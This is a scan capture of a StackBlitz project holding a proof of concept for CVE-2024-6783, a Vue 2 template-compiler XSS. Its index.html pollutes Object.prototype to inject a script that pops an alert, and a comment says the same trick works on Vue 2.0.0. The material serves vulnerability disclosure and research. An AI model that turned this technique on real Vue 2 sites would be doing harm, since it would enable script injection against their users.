stackblitz.com
2600:9000:211e:f400:2:496a:a40:93a1  Public Scan

Submitted URL: https://d2v8y104.na1.hubspotlinks.com/Ctc/5F+113/d2v8y104/VVsxy37ZJNVlN25RkVfvtfd1W6G5rDL5hTmKnN80643d3lcq-W7lCdLW6lZ3nyW4SsSMY904ptwF...
Effective URL: https://stackblitz.com/edit/cve-2024-6783?file=index.html&utm_medium=email&_hsenc=p2ANqtz-_M0ckZDeiVh85SPRTV092n3HekFuG...
Submission: On July 24 via manual from IN — Scanned from DE


Text Content

CVE-2024-6783 - Vue 2 Template Compiler Client-side XSS
Author: JessicaSachs
Proof of Concept for CVE-2024-6783 by HeroDevs

317 views, 7 forks

FILES

_gitignore
index.html
package-lock.json
package.json
tsconfig.json
vite.config.ts
index.html
<!DOCTYPE html>
<html>
  <head>
    <script>
      // Not necessary, but helpful in demonstrating breaking out into `window.alert`
      // You can also get out of the `with (this)` closure by adding closing curly braces
      window.Proxy = undefined;
      Object.prototype.staticClass = `alert("Polluted")`;
    </script>
    <script src="https://cdn.jsdelivr.net/npm/vue@2.7.16/dist/vue.js"></script>
    <!--
      Also available for exploiting on 2.0.0
      <script src="https://cdn.jsdelivr.net/npm/vue@2.0.0/dist/vue.js"></script>
    -->
  </head>

  <body>
    <div id="app"></div>
    <script>
      new window.Vue({
        template: `<div class="">Content</div>`,
      }).$mount('#app');
    </script>
  </body>
</html>
Terminal

# This is a non-commercial version of StackBlitz.
# If you’re using this for business purposes, please purchase a license here.

~/projects/cve-2024-6783
❯ npm install && npm run dev
npm WARN deprecated vue@2.7.16: Vue 2 has reached EOL and is no longer actively maintained. See https://v2.vuejs.org/eol/ for more details.
[############......] | reify:finalize: timing reify:unpack Completed in 27ms